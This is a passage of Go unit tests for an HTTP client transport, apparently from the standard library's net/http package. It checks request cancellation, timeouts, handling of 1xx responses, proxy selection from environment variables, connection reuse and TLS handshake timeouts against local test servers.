	tests := []struct {
		path    string
		want    int
		wantErr string
	}{
		{path: "/fast", want: 200},
		{path: "/slow", wantErr: "timeout awaiting response headers"},
		{path: "/fast", want: 200},
	}
	for i, tt := range tests {
		req, _ := NewRequest("GET", ts.URL+tt.path, nil)
		req = req.WithT(t)
		res, err := c.Do(req)
		select {
		case <-inHandler:
		case <-time.After(5 * time.Second):
			t.Errorf("never entered handler for test index %d, %s", i, tt.path)
			continue
		}
		if err != nil {
			uerr, ok := err.(*url.Error)
			if !ok {
				t.Errorf("error is not a url.Error; got: %#v", err)
				continue
			}
			nerr, ok := uerr.Err.(net.Error)
			if !ok {
				t.Errorf("error does not satisfy net.Error interface; got: %#v", err)
				continue
			}
			if !nerr.Timeout() {
				t.Errorf("want timeout error; got: %q", nerr)
				continue
			}
			if strings.Contains(err.Error(), tt.wantErr) {
				continue
			}
			t.Errorf("%d. unexpected error: %v", i, err)
			continue
		}
		if tt.wantErr != "" {
			t.Errorf("%d. no error. expected error: %v", i, tt.wantErr)
			continue
		}
		if res.StatusCode != tt.want {
			t.Errorf("%d for path %q status = %d; want %d", i, tt.path, res.StatusCode, tt.want)
		}
	}
}

func TestTransportCancelRequest(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	if testing.Short() {
		t.Skip("skipping test in -short mode")
	}
	unblockc := make(chan bool)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		fmt.Fprintf(w, "Hello")
		w.(Flusher).Flush() // send headers and some body
		<-unblockc
	}))
	defer ts.Close()
	defer close(unblockc)

	c := ts.Client()
	tr := c.Transport.(*Transport)

	req, _ := NewRequest("GET", ts.URL, nil)
	res, err := c.Do(req)
	if err != nil {
		t.Fatal(err)
	}
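	// The handler has sent "Hello" and is now blocked, so only the
	// cancellation below can end the body read that follows.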
	go func() {
		time.Sleep(1 * time.Second)
		tr.CancelRequest(req)
	}()
	t0 := time.Now()
	body, err := ioutil.ReadAll(res.Body)
	d := time.Since(t0)

	if err != ExportErrRequestCanceled {
		t.Errorf("Body.Read error = %v; want errRequestCanceled", err)
	}
	if string(body) != "Hello" {
		t.Errorf("Body = %q; want Hello", body)
	}
	if d < 500*time.Millisecond {
		t.Errorf("expected ~1 second delay; got %v", d)
	}
	// Verify no outstanding requests after readLoop/writeLoop
	// goroutines shut down.
	for tries := 5; tries > 0; tries-- {
		n := tr.NumPendingRequestsForTesting()
		if n == 0 {
			break
		}
		time.Sleep(100 * time.Millisecond)
		if tries == 1 {
			t.Errorf("pending requests = %d; want 0", n)
		}
	}
}

func TestTransportCancelRequestInDial(t *testing.T) {
	defer afterTest(t)
	if testing.Short() {
		t.Skip("skipping test in -short mode")
	}
	var logbuf bytes.Buffer
	eventLog := log.New(&logbuf, "", 0)

	unblockDial := make(chan bool)
	defer close(unblockDial)

	inDial := make(chan bool)
	tr := &Transport{
		Dial: func(network, addr string) (net.Conn, error) {
			eventLog.Println("dial: blocking")
			inDial <- true
			<-unblockDial
			return nil, errors.New("nope")
		},
	}
	cl := &Client{Transport: tr}
	gotres := make(chan bool)
	req, _ := NewRequest("GET", "http://something.no-network.tld/", nil)
	go func() {
		_, err := cl.Do(req)
		eventLog.Printf("Get = %v", err)
		gotres <- true
	}()

	select {
	case <-inDial:
	case <-time.After(5 * time.Second):
		t.Fatal("timeout; never saw blocking dial")
	}

	eventLog.Printf("canceling")
	tr.CancelRequest(req)
	tr.CancelRequest(req) // used to panic on second call

	select {
	case <-gotres:
	case <-time.After(5 * time.Second):
		panic("hang. events are: " + logbuf.String())
	}

	got := logbuf.String()
	want := `dial: blocking
canceling
Get = Get http://something.no-network.tld/: net/http: request canceled while waiting for connection
`
	if got != want {
		t.Errorf("Got events:\n%s\nWant:\n%s", got, want)
	}
}

func TestCancelRequestWithChannel(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	if testing.Short() {
		t.Skip("skipping test in -short mode")
	}
	unblockc := make(chan bool)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		fmt.Fprintf(w, "Hello")
		w.(Flusher).Flush() // send headers and some body
		<-unblockc
	}))
	defer ts.Close()
	defer close(unblockc)

	c := ts.Client()
	tr := c.Transport.(*Transport)

	req, _ := NewRequest("GET", ts.URL, nil)
	ch := make(chan struct{})
	req.Cancel = ch

	res, err := c.Do(req)
	if err != nil {
		t.Fatal(err)
	}
	go func() {
		time.Sleep(1 * time.Second)
		close(ch)
	}()
	t0 := time.Now()
	body, err := ioutil.ReadAll(res.Body)
	d := time.Since(t0)

	if err != ExportErrRequestCanceled {
		t.Errorf("Body.Read error = %v; want errRequestCanceled", err)
	}
	if string(body) != "Hello" {
		t.Errorf("Body = %q; want Hello", body)
	}
	if d < 500*time.Millisecond {
		t.Errorf("expected ~1 second delay; got %v", d)
	}
	// Verify no outstanding requests after readLoop/writeLoop
	// goroutines shut down.
	for tries := 5; tries > 0; tries-- {
		n := tr.NumPendingRequestsForTesting()
		if n == 0 {
			break
		}
		time.Sleep(100 * time.Millisecond)
		if tries == 1 {
			t.Errorf("pending requests = %d; want 0", n)
		}
	}
}

func TestCancelRequestWithChannelBeforeDo_Cancel(t *testing.T) {
	testCancelRequestWithChannelBeforeDo(t, false)
}
func TestCancelRequestWithChannelBeforeDo_Context(t *testing.T) {
	testCancelRequestWithChannelBeforeDo(t, true)
}
func testCancelRequestWithChannelBeforeDo(t *testing.T, withCtx bool) {
	setParallel(t)
	defer afterTest(t)
	unblockc := make(chan bool)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		<-unblockc
	}))
	defer ts.Close()
	defer close(unblockc)

	c := ts.Client()

	req, _ := NewRequest("GET", ts.URL, nil)
	if withCtx {
		ctx, cancel := context.WithCancel(context.Background())
		cancel()
		req = req.WithContext(ctx)
	} else {
		ch := make(chan struct{})
		req.Cancel = ch
		close(ch)
	}

	_, err := c.Do(req)
	if ue, ok := err.(*url.Error); ok {
		err = ue.Err
	}
	if withCtx {
		if err != context.Canceled {
			t.Errorf("Do error = %v; want %v", err, context.Canceled)
		}
	} else {
		if err == nil || !strings.Contains(err.Error(), "canceled") {
			t.Errorf("Do error = %v; want cancelation", err)
		}
	}
}

// Issue 11020. The returned error message should be errRequestCanceled.
func TestTransportCancelBeforeResponseHeaders(t *testing.T) {
	defer afterTest(t)

	serverConnCh := make(chan net.Conn, 1)
	tr := &Transport{
		Dial: func(network, addr string) (net.Conn, error) {
			cc, sc := net.Pipe()
			serverConnCh <- sc
			return cc, nil
		},
	}
	defer tr.CloseIdleConnections()
	errc := make(chan error, 1)
	req, _ := NewRequest("GET", "http://example.com/", nil)
	go func() {
		_, err := tr.RoundTrip(req)
		errc <- err
	}()

	sc := <-serverConnCh
	verb := make([]byte, 3)
	if _, err := io.ReadFull(sc, verb); err != nil {
		t.Errorf("Error reading HTTP verb from server: %v", err)
	}
	if string(verb) != "GET" {
		t.Errorf("server received %q; want GET", verb)
	}
	defer sc.Close()

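	// The request line has been written but no response headers have been
	// sent; canceling now must surface errRequestCanceled from RoundTrip.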
	tr.CancelRequest(req)

	err := <-errc
	if err == nil {
		t.Fatalf("unexpected success from RoundTrip")
	}
	if err != ExportErrRequestCanceled {
		t.Errorf("RoundTrip error = %v; want ExportErrRequestCanceled", err)
	}
}

// golang.org/issue/3672 -- Client can't close HTTP stream.
// Calling Close on a Response.Body used to just read until EOF.
// Now it actually closes the TCP connection.
func TestTransportCloseResponseBody(t *testing.T) {
	defer afterTest(t)
	writeErr := make(chan error, 1)
	msg := []byte("young\n")
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		for {
			_, err := w.Write(msg)
			if err != nil {
				writeErr <- err
				return
			}
			w.(Flusher).Flush()
		}
	}))
	defer ts.Close()

	c := ts.Client()
	tr := c.Transport.(*Transport)

	req, _ := NewRequest("GET", ts.URL, nil)
	defer tr.CancelRequest(req)

	res, err := c.Do(req)
	if err != nil {
		t.Fatal(err)
	}

	const repeats = 3
	buf := make([]byte, len(msg)*repeats)
	want := bytes.Repeat(msg, repeats)

	_, err = io.ReadFull(res.Body, buf)
	if err != nil {
		t.Fatal(err)
	}
	if !bytes.Equal(buf, want) {
		t.Fatalf("read %q; want %q", buf, want)
	}
	didClose := make(chan error, 1)
	go func() {
		didClose <- res.Body.Close()
	}()
	select {
	case err := <-didClose:
		if err != nil {
			t.Errorf("Close = %v", err)
		}
	case <-time.After(10 * time.Second):
		t.Fatal("too long waiting for close")
	}
	select {
	case err := <-writeErr:
		if err == nil {
			t.Errorf("expected non-nil write error")
		}
	case <-time.After(10 * time.Second):
		t.Fatal("too long waiting for write error")
	}
}

type fooProto struct{}

func (fooProto) RoundTrip(req *Request) (*Response, error) {
	res := &Response{
		Status:     "200 OK",
		StatusCode: 200,
		Header:     make(Header),
		Body:       ioutil.NopCloser(strings.NewReader("You wanted " + req.URL.String())),
	}
	return res, nil
}

func TestTransportAltProto(t *testing.T) {
	defer afterTest(t)
	tr := &Transport{}
	c := &Client{Transport: tr}
	tr.RegisterProtocol("foo", fooProto{})
	res, err := c.Get("foo://bar.com/path")
	if err != nil {
		t.Fatal(err)
	}
	bodyb, err := ioutil.ReadAll(res.Body)
	if err != nil {
		t.Fatal(err)
	}
	body := string(bodyb)
	if e := "You wanted foo://bar.com/path"; body != e {
		t.Errorf("got response %q, want %q", body, e)
	}
}

func TestTransportNoHost(t *testing.T) {
	defer afterTest(t)
	tr := &Transport{}
	_, err := tr.RoundTrip(&Request{
		Header: make(Header),
		URL: &url.URL{
			Scheme: "http",
		},
	})
	want := "http: no Host in request URL"
	if got := fmt.Sprint(err); got != want {
		t.Errorf("error = %v; want %q", err, want)
	}
}

// Issue 13311
func TestTransportEmptyMethod(t *testing.T) {
	req, _ := NewRequest("GET", "http://foo.com/", nil)
	req.Method = ""                                 // docs say "For client requests an empty string means GET"
	got, err := httputil.DumpRequestOut(req, false) // DumpRequestOut uses Transport
	if err != nil {
		t.Fatal(err)
	}
	if !strings.Contains(string(got), "GET ") {
		t.Fatalf("expected substring 'GET '; got: %s", got)
	}
}

func TestTransportSocketLateBinding(t *testing.T) {
	setParallel(t)
	defer afterTest(t)

	mux := NewServeMux()
	fooGate := make(chan bool, 1)
	mux.HandleFunc("/foo", func(w ResponseWriter, r *Request) {
		w.Header().Set("foo-ipport", r.RemoteAddr)
		w.(Flusher).Flush()
		<-fooGate
	})
	mux.HandleFunc("/bar", func(w ResponseWriter, r *Request) {
		w.Header().Set("bar-ipport", r.RemoteAddr)
	})
	ts := httptest.NewServer(mux)
	defer ts.Close()

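	// dialGate permits exactly one dial; the /bar request below must reuse
	// the /foo connection instead of dialing again.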
	dialGate := make(chan bool, 1)
	c := ts.Client()
	c.Transport.(*Transport).Dial = func(n, addr string) (net.Conn, error) {
		if <-dialGate {
			return net.Dial(n, addr)
		}
		return nil, errors.New("manually closed")
	}

	dialGate <- true // only allow one dial
	fooRes, err := c.Get(ts.URL + "/foo")
	if err != nil {
		t.Fatal(err)
	}
	fooAddr := fooRes.Header.Get("foo-ipport")
	if fooAddr == "" {
		t.Fatal("No addr on /foo request")
	}
	time.AfterFunc(200*time.Millisecond, func() {
		// let the foo response finish so we can use its
		// connection for /bar
		fooGate <- true
		io.Copy(ioutil.Discard, fooRes.Body)
		fooRes.Body.Close()
	})

	barRes, err := c.Get(ts.URL + "/bar")
	if err != nil {
		t.Fatal(err)
	}
	barAddr := barRes.Header.Get("bar-ipport")
	if barAddr != fooAddr {
		t.Fatalf("/foo came from conn %q; /bar came from %q instead", fooAddr, barAddr)
	}
	barRes.Body.Close()
	dialGate <- false
}

// Issue 2184
func TestTransportReading100Continue(t *testing.T) {
	defer afterTest(t)

	const numReqs = 5
	reqBody := func(n int) string { return fmt.Sprintf("request body %d", n) }
	reqID := func(n int) string { return fmt.Sprintf("REQ-ID-%d", n) }

	send100Response := func(w *io.PipeWriter, r *io.PipeReader) {
		defer w.Close()
		defer r.Close()
		br := bufio.NewReader(r)
		n := 0
		for {
			n++
			req, err := ReadRequest(br)
			if err == io.EOF {
				return
			}
			if err != nil {
				t.Error(err)
				return
			}
			slurp, err := ioutil.ReadAll(req.Body)
			if err != nil {
				t.Errorf("Server request body slurp: %v", err)
				return
			}
			id := req.Header.Get("Request-Id")
			resCode := req.Header.Get("X-Want-Response-Code")
			if resCode == "" {
				resCode = "100 Continue"
				if string(slurp) != reqBody(n) {
					t.Errorf("Server got %q, %v; want %q", slurp, err, reqBody(n))
				}
			}
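			// Write the requested informational status line followed
			// immediately by the real response on the same connection.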
			body := fmt.Sprintf("Response number %d", n)
			v := []byte(strings.Replace(fmt.Sprintf(`HTTP/1.1 %s
Date: Thu, 28 Feb 2013 17:55:41 GMT

HTTP/1.1 200 OK
Content-Type: text/html
Echo-Request-Id: %s
Content-Length: %d

%s`, resCode, id, len(body), body), "\n", "\r\n", -1))
			w.Write(v)
			if id == reqID(numReqs) {
				return
			}
		}
	}

	tr := &Transport{
		Dial: func(n, addr string) (net.Conn, error) {
			sr, sw := io.Pipe() // server read/write
			cr, cw := io.Pipe() // client read/write
			conn := &rwTestConn{
				Reader: cr,
				Writer: sw,
				closeFunc: func() error {
					sw.Close()
					cw.Close()
					return nil
				},
			}
			go send100Response(cw, sr)
			return conn, nil
		},
		DisableKeepAlives: false,
	}
	defer tr.CloseIdleConnections()
	c := &Client{Transport: tr}

	testResponse := func(req *Request, name string, wantCode int) {
		t.Helper()
		res, err := c.Do(req)
		if err != nil {
			t.Fatalf("%s: Do: %v", name, err)
		}
		if res.StatusCode != wantCode {
			t.Fatalf("%s: Response StatusCode=%d; want %d", name, res.StatusCode, wantCode)
		}
		if id, idBack := req.Header.Get("Request-Id"), res.Header.Get("Echo-Request-Id"); id != "" && id != idBack {
			t.Errorf("%s: response id %q != request id %q", name, idBack, id)
		}
		_, err = ioutil.ReadAll(res.Body)
		if err != nil {
			t.Fatalf("%s: Slurp error: %v", name, err)
		}
	}

	// A few 100 responses, making sure we're not off-by-one.
	for i := 1; i <= numReqs; i++ {
		req, _ := NewRequest("POST", "http://dummy.tld/", strings.NewReader(reqBody(i)))
		req.Header.Set("Request-Id", reqID(i))
		testResponse(req, fmt.Sprintf("100, %d/%d", i, numReqs), 200)
	}
}

// Issue 17739: the HTTP client must ignore any unknown 1xx
// informational responses before the actual response.
func TestTransportIgnore1xxResponses(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
		conn, buf, _ := w.(Hijacker).Hijack()
		buf.Write([]byte("HTTP/1.1 123 OneTwoThree\r\nFoo: bar\r\n\r\nHTTP/1.1 200 OK\r\nBar: baz\r\nContent-Length: 5\r\n\r\nHello"))
		buf.Flush()
		conn.Close()
	}))
	defer cst.close()
	cst.tr.DisableKeepAlives = true // prevent log spam; our test server is hanging up anyway

	var got bytes.Buffer

	req, _ := NewRequest("GET", cst.ts.URL, nil)
	req = req.WithContext(httptrace.WithClientTrace(context.Background(), &httptrace.ClientTrace{
		Got1xxResponse: func(code int, header textproto.MIMEHeader) error {
			fmt.Fprintf(&got, "1xx: code=%v, header=%v\n", code, header)
			return nil
		},
	}))
	res, err := cst.c.Do(req)
	if err != nil {
		t.Fatal(err)
	}
	defer res.Body.Close()

	res.Write(&got)
	want := "1xx: code=123, header=map[Foo:[bar]]\nHTTP/1.1 200 OK\r\nContent-Length: 5\r\nBar: baz\r\n\r\nHello"
	if got.String() != want {
		t.Errorf(" got: %q\nwant: %q\n", got.Bytes(), want)
	}
}

func TestTransportLimits1xxResponses(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
		conn, buf, _ := w.(Hijacker).Hijack()
		for i := 0; i < 10; i++ {
			buf.Write([]byte("HTTP/1.1 123 OneTwoThree\r\n\r\n"))
		}
		buf.Write([]byte("HTTP/1.1 204 No Content\r\n\r\n"))
		buf.Flush()
		conn.Close()
	}))
	defer cst.close()
	cst.tr.DisableKeepAlives = true // prevent log spam; our test server is hanging up anyway

	res, err := cst.c.Get(cst.ts.URL)
	if res != nil {
		defer res.Body.Close()
	}
	got := fmt.Sprint(err)
	wantSub := "too many 1xx informational responses"
	if !strings.Contains(got, wantSub) {
		t.Errorf("Get error = %v; want substring %q", err, wantSub)
	}
}

// Issue 26161: the HTTP client must treat 101 responses
// as the final response.
func TestTransportTreat101Terminal(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
		conn, buf, _ := w.(Hijacker).Hijack()
		buf.Write([]byte("HTTP/1.1 101 Switching Protocols\r\n\r\n"))
		buf.Write([]byte("HTTP/1.1 204 No Content\r\n\r\n"))
		buf.Flush()
		conn.Close()
	}))
	defer cst.close()
	res, err := cst.c.Get(cst.ts.URL)
	if err != nil {
		t.Fatal(err)
	}
	defer res.Body.Close()
	if res.StatusCode != StatusSwitchingProtocols {
		t.Errorf("StatusCode = %v; want 101 Switching Protocols", res.StatusCode)
	}
}

type proxyFromEnvTest struct {
	req string // URL to fetch; blank means "http://example.com"

	env      string // HTTP_PROXY
	httpsenv string // HTTPS_PROXY
	noenv    string // NO_PROXY
	reqmeth  string // REQUEST_METHOD

	want    string
	wanterr error
}

func (t proxyFromEnvTest) String() string {
	var buf bytes.Buffer
	space := func() {
		if buf.Len() > 0 {
			buf.WriteByte(' ')
		}
	}
	if t.env != "" {
		fmt.Fprintf(&buf, "http_proxy=%q", t.env)
	}
	if t.httpsenv != "" {
		space()
		fmt.Fprintf(&buf, "https_proxy=%q", t.httpsenv)
	}
	if t.noenv != "" {
		space()
		fmt.Fprintf(&buf, "no_proxy=%q", t.noenv)
	}
	if t.reqmeth != "" {
		space()
		fmt.Fprintf(&buf, "request_method=%q", t.reqmeth)
	}
	req := "http://example.com"
	if t.req != "" {
		req = t.req
	}
	space()
	fmt.Fprintf(&buf, "req=%q", req)
	return strings.TrimSpace(buf.String())
}

var proxyFromEnvTests = []proxyFromEnvTest{
	{env: "127.0.0.1:8080", want: "http://127.0.0.1:8080"},
	{env: "cache.corp.example.com:1234", want: "http://cache.corp.example.com:1234"},
	{env: "cache.corp.example.com", want: "http://cache.corp.example.com"},
	{env: "https://cache.corp.example.com", want: "https://cache.corp.example.com"},
	{env: "http://127.0.0.1:8080", want: "http://127.0.0.1:8080"},
	{env: "https://127.0.0.1:8080", want: "https://127.0.0.1:8080"},
	{env: "socks5://127.0.0.1", want: "socks5://127.0.0.1"},

	// Don't use the HTTPS proxy for plain http requests.
	{req: "http://insecure.tld/", env: "http.proxy.tld", httpsenv: "secure.proxy.tld", want: "http://http.proxy.tld"},
	// Use the HTTPS proxy for https requests.
	{req: "https://secure.tld/", env: "http.proxy.tld", httpsenv: "secure.proxy.tld", want: "http://secure.proxy.tld"},
	{req: "https://secure.tld/", env: "http.proxy.tld", httpsenv: "https://secure.proxy.tld", want: "https://secure.proxy.tld"},

	// Issue 16405: don't use HTTP_PROXY in a CGI environment,
	// where HTTP_PROXY can be attacker-controlled.
	{env: "http://10.1.2.3:8080", reqmeth: "POST",
		want:    "<nil>",
		wanterr: errors.New("refusing to use HTTP_PROXY value in CGI environment; see golang.org/s/cgihttpproxy")},

	{want: "<nil>"},

	{noenv: "example.com", req: "http://example.com/", env: "proxy", want: "<nil>"},
	{noenv: ".example.com", req: "http://example.com/", env: "proxy", want: "http://proxy"},
	{noenv: "ample.com", req: "http://example.com/", env: "proxy", want: "http://proxy"},
	{noenv: "example.com", req: "http://foo.example.com/", env: "proxy", want: "<nil>"},
	{noenv: ".foo.com", req: "http://example.com/", env: "proxy", want: "http://proxy"},
}

func testProxyForRequest(t *testing.T, tt proxyFromEnvTest, proxyForRequest func(req *Request) (*url.URL, error)) {
	t.Helper()
	reqURL := tt.req
	if reqURL == "" {
		reqURL = "http://example.com"
	}
	req, _ := NewRequest("GET", reqURL, nil)
	url, err := proxyForRequest(req)
	if g, e := fmt.Sprintf("%v", err), fmt.Sprintf("%v", tt.wanterr); g != e {
		t.Errorf("%v: got error = %q, want %q", tt, g, e)
		return
	}
	if got := fmt.Sprintf("%s", url); got != tt.want {
		t.Errorf("%v: got URL = %q, want %q", tt, url, tt.want)
	}
}

func TestProxyFromEnvironment(t *testing.T) {
	ResetProxyEnv()
	defer ResetProxyEnv()
	for _, tt := range proxyFromEnvTests {
		testProxyForRequest(t, tt, func(req *Request) (*url.URL, error) {
			os.Setenv("HTTP_PROXY", tt.env)
			os.Setenv("HTTPS_PROXY", tt.httpsenv)
			os.Setenv("NO_PROXY", tt.noenv)
			os.Setenv("REQUEST_METHOD", tt.reqmeth)
			ResetCachedEnvironment()
			return ProxyFromEnvironment(req)
		})
	}
}

func TestProxyFromEnvironmentLowerCase(t *testing.T) {
	ResetProxyEnv()
	defer ResetProxyEnv()
	for _, tt := range proxyFromEnvTests {
		testProxyForRequest(t, tt, func(req *Request) (*url.URL, error) {
			os.Setenv("http_proxy", tt.env)
			os.Setenv("https_proxy", tt.httpsenv)
			os.Setenv("no_proxy", tt.noenv)
			os.Setenv("REQUEST_METHOD", tt.reqmeth)
			ResetCachedEnvironment()
			return ProxyFromEnvironment(req)
		})
	}
}

func TestIdleConnChannelLeak(t *testing.T) {
	// Not parallel: uses global test hooks.
	var mu sync.Mutex
	var n int

	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		mu.Lock()
		n++
		mu.Unlock()
	}))
	defer ts.Close()

	const nReqs = 5
	didRead := make(chan bool, nReqs)
	SetReadLoopBeforeNextReadHook(func() { didRead <- true })
	defer SetReadLoopBeforeNextReadHook(nil)

	c := ts.Client()
	tr := c.Transport.(*Transport)
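	// Each request below uses a distinct fake hostname, giving each one its
	// own idle-connection key; the Dial override routes them all to ts.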
	tr.Dial = func(netw, addr string) (net.Conn, error) {
		return net.Dial(netw, ts.Listener.Addr().String())
	}

	// First without keep-alives, then with them.
	for _, disableKeep := range []bool{true, false} {
		tr.DisableKeepAlives = disableKeep
		for i := 0; i < nReqs; i++ {
			_, err := c.Get(fmt.Sprintf("http://foo-host-%d.tld/", i))
			if err != nil {
				t.Fatal(err)
			}
			// Note: no res.Body.Close is needed here, since the
			// response Content-Length is zero. Perhaps the test
			// should be more explicit and use a HEAD, but tests
			// elsewhere guarantee that zero byte responses generate
			// a "Content-Length: 0" instead of chunking.
		}

		// At this point, each of the 5 Transport.readLoop goroutines
		// is noting that there is no response body (see the earlier
		// comment) and then calling putIdleConn, which decrements
		// this count. Usually that happens quickly, which is why this
		// test has seemed to work for ages. But it's still racy: we
		// have to wait for them to finish first. See Issue 10427.
		for i := 0; i < nReqs; i++ {
			<-didRead
		}

		if got := tr.IdleConnChMapSizeForTesting(); got != 0 {
			t.Fatalf("ForDisableKeepAlives = %v, map size = %d; want 0", disableKeep, got)
		}
	}
}

// Verify the status quo: that the Client.Post function coerces its
// body into a ReadCloser if it's a Closer, and that the Transport
// then closes it.
func TestTransportClosesRequestBody(t *testing.T) {
	defer afterTest(t)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		io.Copy(ioutil.Discard, r.Body)
	}))
	defer ts.Close()

	c := ts.Client()

	closes := 0

	res, err := c.Post(ts.URL, "text/plain", countCloseReader{&closes, strings.NewReader("hello")})
	if err != nil {
		t.Fatal(err)
	}
	res.Body.Close()
	if closes != 1 {
		t.Errorf("closes = %d; want 1", closes)
	}
}

func TestTransportTLSHandshakeTimeout(t *testing.T) {
	defer afterTest(t)
	if testing.Short() {
		t.Skip("skipping in short mode")
	}
	ln := newLocalListener(t)
	defer ln.Close()
	testdonec := make(chan struct{})
	defer close(testdonec)

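	// Accept the TCP connection but never start a TLS handshake, so the
	// client's handshake can only end via TLSHandshakeTimeout.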
	go func() {
		c, err := ln.Accept()
		if err != nil {
			t.Error(err)
			return
		}
		<-testdonec
		c.Close()
	}()

	getdonec := make(chan struct{})
	go func() {
		defer close(getdonec)
		tr := &Transport{
			Dial: func(_, _ string) (net.Conn, error) {
				return net.Dial("tcp", ln.Addr().String())
			},
			TLSHandshakeTimeout: 250 * time.Millisecond,
		}
		cl := &Client{Transport: tr}
		_, err := cl.Get("https://dummy.tld/")
		if err == nil {
			t.Error("expected error")
			return
		}
		ue, ok := err.(*url.Error)
		if !ok {
			t.Errorf("expected url.Error; got %#v", err)
			return
		}
		ne, ok := ue.Err.(net.Error)
		if !ok {
			t.Errorf("expected net.Error; got %#v", err)
			return
		}
		if !ne.Timeout() {
			t.Errorf("expected timeout error; got %v", err)
		}
		if !strings.Contains(err.Error(), "handshake timeout") {
			t.Errorf("expected 'handshake timeout' in error; got %v", err)
		}
	}()
	select {
	case <-getdonec:
	case <-time.After(5 * time.Second):
		t.Error("test timeout; TLS handshake hung?")
	}
}

// Trying to repro golang.org/issue/3514
func TestTLSServerClosesConnection(t *testing.T) {
	defer afterTest(t)

	closedc := make(chan bool, 1)
	ts := httptest.NewTLSServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		if strings.Contains(r.URL.Path, "/keep-alive-then-die") {
			conn, _, _ := w.(Hijacker).Hijack()
			conn.Write([]byte("HTTP/1.1 200 OK\r\nContent-Length: 3\r\n\r\nfoo"))
			conn.Close()
			closedc <- true
			return
		}
		fmt.Fprintf(w, "hello")
	}))
	defer ts.Close()

	c := ts.Client()
	tr := c.Transport.(*Transport)

	var nSuccess = 0
	var errs []error
	const trials = 20
	for i := 0; i < trials; i++ {
		tr.CloseIdleConnections()
		res, err := c.Get(ts.URL + "/keep-alive-then-die")
		if err != nil {
			t.Fatal(err)
		}
		<-closedc
		slurp, err := ioutil.ReadAll(res.Body)
		if err != nil {
			t.Fatal(err)
		}
		if string(slurp) != "foo" {
			t.Errorf("Got %q, want foo", slurp)
		}

		// Now try again and see if we successfully
		// pick a new connection.
		res, err = c.Get(ts.URL + "/")
		if err != nil {
			errs = append(errs, err)
			continue
		}
		slurp, err = ioutil.ReadAll(res.Body)
		if err != nil {
			errs = append(errs, err)
			continue
		}
		nSuccess++
	}
	if nSuccess > 0 {
		t.Logf("successes = %d of %d", nSuccess, trials)
	} else {
		t.Errorf("All runs failed:")
	}
	for _, err := range errs {
		t.Logf("  err: %v", err)
	}
}

// byteFromChanReader is an io.Reader that reads a single byte at a
// time from the channel. When the channel is closed, the reader
// returns io.EOF.
type byteFromChanReader chan byte

func (c byteFromChanReader) Read(p []byte) (n int, err error) {
	if len(p) == 0 {
		return
	}
	b, ok := <-c
	if !ok {
		return 0, io.EOF
	}
	p[0] = b
	return 1, nil
}

// Verifies that the Transport doesn't reuse a connection in the case
// where the server replies before the request has been fully
// written. We still honor that reply (see TestIssue3595), but don't
// send future requests on the connection because it's then in a
// questionable state.
// golang.org/issue/7569
func TestTransportNoReuseAfterEarlyResponse(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	var sconn struct {
		sync.Mutex
		c net.Conn
	}
	var getOkay bool
	closeConn := func() {
		sconn.Lock()
		defer sconn.Unlock()
		if sconn.c != nil {
			sconn.c.Close()
			sconn.c = nil
			if !getOkay {
				t.Logf("Closed server connection")
			}
		}
	}
	defer closeConn()

	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		if r.Method == "GET" {
			io.WriteString(w, "bar")
			return
		}
		conn, _, _ := w.(Hijacker).Hijack()
		sconn.Lock()
		sconn.c = conn
		sconn.Unlock()
		conn.Write([]byte("HTTP/1.1 200 OK\r\nContent-Length: 3\r\n\r\nfoo")) // keep-alive
		go io.Copy(ioutil.Discard, conn)
	}))
	defer ts.Close()
	c := ts.Client()

	const bodySize = 256 << 10
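	// finalBit withholds the last byte of the request body, keeping the
	// POST's write loop blocked until the test releases it below.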
	finalBit := make(byteFromChanReader, 1)
	req, _ := NewRequest("POST", ts.URL, io.MultiReader(io.LimitReader(neverEnding('x'), bodySize-1), finalBit))
	req.ContentLength = bodySize
	res, err := c.Do(req)
	if err := wantBody(res, err, "foo"); err != nil {
		t.Errorf("POST response: %v", err)
	}
	donec := make(chan bool)
	go func() {
		defer close(donec)
		res, err = c.Get(ts.URL)
		if err := wantBody(res, err, "bar"); err != nil {
			t.Errorf("GET response: %v", err)
			return
		}
		getOkay = true // suppress test noise
	}()
	time.AfterFunc(5*time.Second, closeConn)
	select {
	case <-donec:
		finalBit <- 'x' // unblock the writeloop of the first Post
		close(finalBit)
	case <-time.After(7 * time.Second):
		t.Fatal("timeout waiting for GET request to finish")
	}
}

// Tests that we don't leak Transport persistConn.readLoop goroutines
// when a server hangs up immediately after saying it would keep-alive.
func TestTransportIssue10457(t *testing.T) {
	defer afterTest(t) // used to fail in goroutine leak check
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		// Send a response with no body, keep-alive
		// (implicit), and then lie and immediately close the
		// connection. This forces the Transport's readLoop to
		// immediately Peek an io.EOF and get to the point
		// that used to hang.
		conn, _, _ := w.(Hijacker).Hijack()
		conn.Write([]byte("HTTP/1.1 200 OK\r\nFoo: Bar\r\nContent-Length: 0\r\n\r\n")) // keep-alive
		conn.Close()
	}))
	defer ts.Close()
	c := ts.Client()

	res, err := c.Get(ts.URL)
	if err != nil {
		t.Fatalf("Get: %v", err)
	}
	defer res.Body.Close()

	// Just a sanity check that we at least get the response. The real
	// test here is that the "defer afterTest" above doesn't find any
	// leaked goroutines.
	if got, want := res.Header.Get("Foo"), "Bar"; got != want {
		t.Errorf("Foo header = %q; want %q", got, want)
	}
}

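// errorReader returns a fixed error from every Read call.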
type errorReader struct {
	err error
}

func (e errorReader) Read(p []byte) (int, error) { return 0, e.err }

type closerFunc func() error

func (f closerFunc) Close() error { return f() }

